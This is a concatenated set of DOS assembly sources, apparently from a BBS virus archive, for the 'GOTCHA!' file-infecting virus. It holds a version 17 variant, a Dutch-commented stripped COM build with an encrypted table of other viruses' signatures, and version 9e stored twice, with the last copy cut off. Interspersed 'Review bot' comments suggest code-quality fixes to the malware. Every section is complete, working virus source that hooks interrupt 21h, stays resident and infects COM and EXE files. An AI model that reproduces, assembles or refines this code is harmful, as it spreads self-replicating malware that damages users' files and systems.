;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
.RADIX 16
cseg segment
assume cs:cseg,ds:cseg,es:nothing
VERSION equ 17d
FILELEN equ end - start
RESPAR equ (FILELEN/16d) + 18d
BUFLEN equ 18
ENVLEN equ signature- envstring
COMSIGN equ 0
EXESIGN equ 1
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 0100
begin: db 0E9, BUFLEN+1, 0 ;jump to virus entry
;****************************************************************************
;* Data
;****************************************************************************
org 0103
start:
buffer db 0CDh, 20 ;original code
db (BUFLEN-2) dup (?)
comexe db COMSIGN ;dummy program is a COM program
;****************************************************************************
;* Install the virus
;****************************************************************************
call start2
start2: pop si
sub si,(BUFLEN+4) ;si = begin virus
mov di,0100
cld
cmp byte ptr cs:[si+BUFLEN],COMSIGN
jz entryC
entryE: mov ax,ds ;calculate CS
add ax,10
add ax,cs:[si+16]
push ax ;push new CS on stack
push cs:[si+14] ;push new IP on stack
jmp short entcheck
entryC: push cs ;push new CS on stack
push di ;push new IP on stack
push di
push si
movsw ;restore old file-begin
movsb
pop si
pop di
entcheck: mov ax,0DADA ;already installed?
int 21
cmp ah,0A5
je entstop
mov ax,3000 ;test DOS version >= 3.1?
int 21
xchg ah,al
cmp ax,030A
jb entstop
push ds
push es
mov ax,ds ;adjust memory-size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5A
jnz cancel
mov ax,ds:[0003]
sub ax,low RESPAR
jb cancel
mov ds:[0003],ax
sub word ptr ds:[0012],low RESPAR
mov es,ds:[0012] ;copy program to top
push cs
pop ds
mov cx,FILELEN
rep movsb
mov ds,cx ;get original int21 vector
mov si,4*21
movsw ;move it to the end
movsw
push es ;set vector to new handler
pop ds
mov dx,offset ni21-3
mov ax,2521
int 21
cancel: pop es
pop ds
entstop: db 0CBh ;retf
;****************************************************************************
;* Interupt 24 handler
;****************************************************************************
ni24: mov al,3
iret
;****************************************************************************
;* Interupt 21 handler
;****************************************************************************
ni21: pushf
cmp ax,0DADA ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ah,3E ;close ?
jne vvv
mov ah,45 ;duplicate handle
jmp short doit
vvv: cmp ax,4B00 ;execute ?
jne exit
mov ah,3Dh ;open the file
doit: int 21
jc exit
xchg ax,bx
call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
org21: jmp dword ptr cs:[oi21-3] ;call to old int-handler
do_DADA: mov ax,0A500+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Close the file
;****************************************************************************
close: mov ah,3E ;close the file
pushf
push cs
call org21
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
push bx
mov ah,62 ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov es,ds:[002C]
xor di,di
pop bx
push cs
pop ds
envloop: mov si,offset envstring-3 ;check the environment
mov cx,ENVLEN
repz cmpsb
jz close ;exit if item found
dec di ;goto next item
xor al,al
mov ch,0FF
repnz scasb
cmp byte ptr es:[di],0 ;finnished environment?
jnz envloop
mov ax,3300 ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov dx,bx
mov ax,3524 ;get int24 vector
int 21
push bx
push es
mov bx,dx
push cs
pop ds
mov dx,offset ni24 ;set int24 vector
mov ah,25
push ax
int 21
mov ax,1220 ;get file-table entry
push bx
push ax
int 2F
mov bl,es:[di]
pop ax
sub al,0A
int 2F
pop bx
push es
pop ds
push [di+2] ;save attribute & open-mode
push [di+4]
cmp word ptr [di+28],'XE' ;check extension
jne not_exe
cmp byte ptr [di+2A],'E'
jmp short check
not_exe: cmp word ptr [di+28],'OC'
jne close1v
cmp byte ptr [di+2A],'M'
check: je check_name
close1v: jmp close1
check_name: cmp byte ptr [di+20],'V' ;name is V*.* ?
je close1v
cmp byte ptr [di+20],'F' ;name is F*.* ?
je close1v
mov cx,7 ;name is *SC*.* ?
mov ax,'CS'
push di
add di,21
SCloop: dec di
scasw
loopnz SCloop
pop di
je close1v
mov byte ptr [di+2],2 ;open for read/write
mov byte ptr [di+4],0 ;clear attributes
call getlen
mov cl,3
sub ax,cx ;goto signature
sbb dx,0
call goto
push ax ;save old offset
push dx
push cs
pop ds
mov si,0100 ;read signature
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],'!A' ;already infected?
je close2v
call gotobegin
mov cl,BUFLEN ;read begin
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],5A4Dh ;EXE ?
jz do_EXE
cmp word ptr [si],4D5A
jz do_EXE
do_COM: mov byte ptr [si+BUFLEN],COMSIGN
cmp byte ptr es:[di+12],0FC ;check length
jnb close2
cmp byte ptr es:[di+12],3
jbe close2
call writeprog ;write program to end of file
jnz close2
mov byte ptr [si],0E9h ;JMP xxxx'
call getoldlen
add ax,(BUFLEN-2)
mov word ptr [si+1],ax
jmp short done
close2v: jmp short close2
do_EXE: mov byte ptr [si+BUFLEN],EXESIGN
call writeprog ;write program to end of file
jnz close2
call getlen ;calculate new length
mov cx,0200 ;put new length in header
div cx
inc ax
mov word ptr [si+4],ax
mov word ptr [si+2],dx
call getoldlen ;calculate new CS & IP
mov cx,0010
div cx
sub ax,word ptr [si+8]
mov word ptr [si+16],ax ;put CS in header
add dx,BUFLEN+1
mov word ptr [si+14],dx ;put IP in header
done: call gotobegin
mov cx,BUFLEN ;write new begin
mov dx,si
mov ah,40
int 21
close2: push es
pop ds
pop dx ;restore old offset in file
pop ax
call goto
or byte ptr [di+6],40 ;no time-change
close1: call close
or byte ptr [di+5],40 ;no EOF on next close
pop [di+4] ;restore attribute & open-mode
pop [di+2]
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
ret
;****************************************************************************
;* Get original length of program
;****************************************************************************
getoldlen: call getlen
sub ax,FILELEN
sbb dx,0
ret
;****************************************************************************
;* Get length of program
;****************************************************************************
getlen: mov ax,es:[di+11]
mov dx,es:[di+13]
ret
;****************************************************************************
;* Goto new offset DX:AX
;****************************************************************************
gotobegin: xor ax,ax
cwd
goto: xchg ax,es:[di+15]
xchg dx,es:[di+17]
ret
;****************************************************************************
;* Write virus to the file
;****************************************************************************
writeprog: call getlen
call goto
mov cx,FILELEN ;write virus
mov dx,si
mov ah,40
int 21
cmp cx,ax ;are all bytes written?
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring db 'E=mcý',0
signature: db 'GOTCHA!',0 ;I have got you! :-)
oi21:
end:
cseg ends
end begin
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
@@ -0,0 +1,397 @@
;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ eind - begin
RESPAR equ (FILELEN/16) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx,bx
mov cl,07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl,[sign]
call crypt
inc cl
and cl,07h
mov [sign],cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ;naar oude int-handler
ni_verder: cmp ax,0DADAh
jne exit
mov ax,0A500h+VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax,3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [handle],ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [oldlen],ax
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
jc finnish
mov cx,SIGNLEN ;lees de laatse bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx
jz finnish
call beginptr ;lees begin van file
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish
cmp word ptr [buffer],5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax,[oldlen] ;bereken call-adres
add ax,offset entry
sub ax,0103
mov byte ptr [buffer],0E9h
mov word ptr [buffer+1],ax
call beginptr ;pas begin van file aan
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish
finnish: mov bx,[handle] ;sluit de file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al,14h
mul cl
add ax,offset virsig
mov si,ax
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah
cryploop: lodsw
xor ax,0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al,00h ;naar begin van de file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ;naar eind van de file
xor cx,cx
xor dx,dx
; jmp ptrmov
ptrmov: mov ah,42h
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h
mov bx,[handle]
int 21
ret
flread: push cs
pop ds
mov ah,3Fh
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin programma - 100
cld
mov ax,bx ;copieer oude begin terug
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah,0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax,ax ;haal oude vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx
mov ax,ds ;pas geheugen-grootte aan
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
mov es,es:[0012h] ;copieer programma naar top
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!',0
signend:
eind:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
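Review bot: The layout of the `virsig` table is hard-coded in `crypt` (`mov al,14h` as the entry stride, `mov cx,0Ah` words per entry) but nothing at the `virsig:` label says so, so a reader has to reverse the arithmetic to see that the table is eight 20-byte entries indexed by `[sign]` (masked with `and cl,07h`). A comment at `virsig:` such as `; 8 entries x 20 bytes; entry size is assumed by crypt (14h bytes / 0Ah words)` would make that coupling explicit, and the stale `;virsig:` label left inside the commented-out XA1 block should go so it is not mistaken for the live label. For anyone cataloguing the sample, the `'GOTCHA!',0` trailer at `signature:` is the marker the code itself checks at `verder3` before touching a file, and is worth stating in the file header.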
@@ -0,0 +1,576 @@
;****************************************************************************
;* GOTCHA! Version 9e
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ end - begin
RESPAR equ (FILELEN/16) + 17
VERSION equ 9
BUFLEN equ 20h
COMSIGN equ 0
EXESIGN equ 1
MINTARGET equ 1000
MAXTARGET equ -FILELEN
.RADIX 16
;****************************************************************************
;* Start the program!
;****************************************************************************
begin: xor bx,bx
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?,?
nameptr dw ?,?
handle dw ?
comexe db ?
;****************************************************************************
;* File-extensions
;****************************************************************************
EXE_txt db 'EXE'
COM_txt db 'COM'
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,0DADAh ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ax,6C00h ;open/create 4.00 ?
je do_6C00
cmp ah,56h ;rename ?
je doit
cmp ah,4Eh ;findfirst ?
je doit ;(only works without wildcards)
cmp ah,4Bh ;load / execute ?
je doit
cmp ah,43h ;attributes
je doit
cmp ah,41h ;delete ?
je doit ;(it might be un-deleted!)
cmp ah,3Dh ;open ?
je do_3D
cmp ah,17h ;FCB-rename?
je doFCB
cmp ah,13h ;FCB-delete?
jne exit
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!
doit: call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_3D: test al,03h ;only if opened for READING
jne exit
jmp short doit
do_6C00: test bl,03h ;idem
jne exit
mov dx,di ;ptr was DS:DI
jmp short doit
do_DADA: mov ax,0A500h+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Old Interupt handler 21
;****************************************************************************
org21: pushf
call dword ptr cs:[oi21] ;call to old int-handler
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov cs:[nameptr],dx ;save the ptr to the filename
mov cs:[nameptr+2],ds
mov ah,62h ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov ax,ds:002Ch
mov ds,ax
mov si,0
envloop: cmp ds:[si],byte ptr 0 ;end of environment?
je verder7
push cs
pop es
mov di,offset envstring
mov bx,0
scloop: mov al,ds:[si] ;check the current env-item
cmpsb
je scv1
inc bx ;characters don't match!
scv1: cmp al,0 ;end of env-item?
jne scloop
cmp bx,0 ;did all characters match?
je return
jmp short envloop
verder7: push cs ;check the filename
pop ds
les di,dword ptr [nameptr]
mov dx,di
mov cx,80 ;search end of filename (-EXT)
mov al,'.'
repnz scasb
mov bx,di
std ;find begin of filename
mov cl,11
mov al,'\'
repnz scasb
cld
je vvv
mov di,dx
jmp short vvv2
vvv: add di,2
vvv2: mov al,'V' ;is it V*.* ?
scasb
je return
mov cl,7 ;is it *AN*.* ?
mov ax,'NA'
ANloop: dec di
scasw
loopnz ANloop
je return
mov si,offset EXE_txt ;is extension 'EXE'?
mov di,bx
mov cx,3
rep cmpsb
jnz verder4
mov byte ptr [comexe],EXESIGN
jmp short verder3
return: ret
verder4: mov si,offset COM_txt ;is extension 'COM'?
mov di,bx
mov cx,3
rep cmpsb
jnz return
mov byte ptr [comexe],COMSIGN
verder3: mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;get file-attribute
mov ax,4300h
call org21
push cx
and cx,0F8h ;clear READ-ONLY-flag
call setattr
jc return1_v
push cs ;open the file
pop ds
lds dx,dword ptr [nameptr]
mov ax,3D02h
int 21
jnc verder2
return1_v: jmp return1 ;something went wrong... :-(
verder2: push cs ;save handle
pop ds
mov [handle],ax
mov bx,[handle] ;get file date & time
mov ax,5700h
int 21
push cx
push dx
call endptr ;get file-length
mov [oldlen],ax
mov [oldlen+2],dx
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc return2_v
push cs ;compare bytes with signature
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
jz return2_v
call beginptr ;read begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flread
cmp byte ptr [comexe],EXESIGN
jz do_exe
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
jnb return2
cmp word ptr [oldlen],MINTARGET
jbe return2
call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new start-adres
add ax,(offset entry - 0103h)
mov byte ptr [buffer],0E9h ;'JMP'
mov word ptr [buffer+1],ax
jmp short verder1
return2_v: jmp short return2
do_exe: call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new length
mov dx,[oldlen+2]
add ax,FILELEN
adc dx,0
mov cl,9 ;put new length in header
shr ax,cl
mov cl,7
shl dx,cl
or ax,dx
inc ax
mov word ptr [buffer+4],ax
mov ax,[oldlen]
add ax,FILELEN
and ax,01FFh
mov word ptr [buffer+2],ax
mov ax,[oldlen] ;calculate new CS & IP
mov dx,[oldlen+2]
mov bx,word ptr [buffer+8]
push ax
mov cl,4
shr ax,cl
mov cl,0Ch
shl dx,cl
add ax,dx
sub ax,bx
mov word ptr [buffer+16h],ax ;put CS in header
pop ax
and ax,000Fh
add ax,(offset entry - 0100h)
mov word ptr [buffer+14h],ax ;put IP in header
verder1: call beginptr ;write new begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
return2: mov bx,[handle] ;restore file date & time
pop dx
pop cx
mov ax,5701h
int 21
mov bx,[handle] ;close the file
mov ah,3Eh
int 21
return1: pop cx ;restore file-attribute
call setattr
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
ret
;****************************************************************************
;* Gets ASCIIZ-filename from FCB
;****************************************************************************
FCBtoASC: mov si,dx
lodsb
inc al ;extended FCB?
jne normal_FCB
add si,7
normal_FCB: push cs
pop es
xor di,di ;adres for ASCIIZ-name
mov dx,di
mov cx,8
FCB_loop: lodsb ;copy all except spaces
cmp al,' '
je FCB_verder
stosb
FCB_verder: loop FCB_loop
mov al,'.' ;append a '.'
stosb
mov cl,3 ;and the extension
rep movsb
xchg ax,cx ;and a final zero.
stosb
push es
pop ds
ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: lds dx,dword ptr cs:[nameptr]
mov ax,4301h
call org21
ret
;****************************************************************************
;* Writes program to end of file
;****************************************************************************
writeprog: call endptr
mov cx,FILELEN
mov dx,offset begin
; call flwrite ;Hmm, save a few bytes!
; ret
;****************************************************************************
;* Subroutines for reading/writing
;****************************************************************************
flwrite: mov ah,40h
jmp short flvrdr
flread: mov ah,3Fh
flvrdr: push cs
pop ds
mov bx,cs:[handle]
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov al,00h ;go to begin of file
jmp short ptrvrdr
endptr: mov al,02h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
ptrmov: mov bx,cs:[handle] ;go somewhere
mov ah,42h
int 21
ret
;****************************************************************************
;* This is where infected files start
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin program - 100h
pushf
cld
cmp byte ptr cs:[bx+offset comexe],COMSIGN
jz entryC
entryE: mov ax,ds ;put old start-adres on stack
add ax,10
add ax,cs:[bx+offset buffer+016h]
push ax
push cs:[bx+offset buffer+014h]
jmp short entcheck
entryC: mov ax,bx ;restore old file-begin
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
push cs ;put old start-adres on stack
mov ax,0100h
push ax
entcheck: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop
call install ;install the program
entstop: iret
;****************************************************************************
;* Install the program at top of memory
;****************************************************************************
install: push ds
push es
xor ax,ax ;get original int21 vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov cs:[bx+offset oi21],cx
mov cs:[bx+offset oi21+2],dx
mov ax,ds ;adjust memory-size
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
push cs ;copy program to top
pop ds
mov es,es:[0012h]
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;set vector to new handler
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring: db 'E=mcý',0 ;put this in your environment!
signature: db 'GOTCHA!',0 ;I have got you! :-)
signend:
end:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
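Review bot: The file section starting at the next hunk header (`@@ -0,0 +1,571 @@`) carries the same `;* GOTCHA! Version 9e` header and, line for line in the visible text, the same code as this section; the only visible difference is the four-line contact banner plus blank line at this section's tail, which matches the 576 versus 571 line counts. The archive is therefore storing one sample twice; if no other difference exists, keeping a single copy, or recording in the duplicate's header where it was taken from, would avoid the redundancy. Neither section shows a file path in the rendered text, so which location each copy lands on cannot be confirmed here.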
@@ -0,0 +1,571 @@
;****************************************************************************
;* GOTCHA! Version 9e
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ end - begin
RESPAR equ (FILELEN/16) + 17
VERSION equ 9
BUFLEN equ 20h
COMSIGN equ 0
EXESIGN equ 1
MINTARGET equ 1000
MAXTARGET equ -FILELEN
.RADIX 16
;****************************************************************************
;* Start the program!
;****************************************************************************
begin: xor bx,bx
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?,?
nameptr dw ?,?
handle dw ?
comexe db ?
;****************************************************************************
;* File-extensions
;****************************************************************************
EXE_txt db 'EXE'
COM_txt db 'COM'
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,0DADAh ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ax,6C00h ;open/create 4.00 ?
je do_6C00
cmp ah,56h ;rename ?
je doit
cmp ah,4Eh ;findfirst ?
je doit ;(only works without wildcards)
cmp ah,4Bh ;load / execute ?
je doit
cmp ah,43h ;attributes
je doit
cmp ah,41h ;delete ?
je doit ;(it might be un-deleted!)
cmp ah,3Dh ;open ?
je do_3D
cmp ah,17h ;FCB-rename?
je doFCB
cmp ah,13h ;FCB-delete?
jne exit
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!
doit: call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_3D: test al,03h ;only if opened for READING
jne exit
jmp short doit
do_6C00: test bl,03h ;idem
jne exit
mov dx,di ;ptr was DS:DI
jmp short doit
do_DADA: mov ax,0A500h+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Old Interupt handler 21
;****************************************************************************
org21: pushf
call dword ptr cs:[oi21] ;call to old int-handler
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
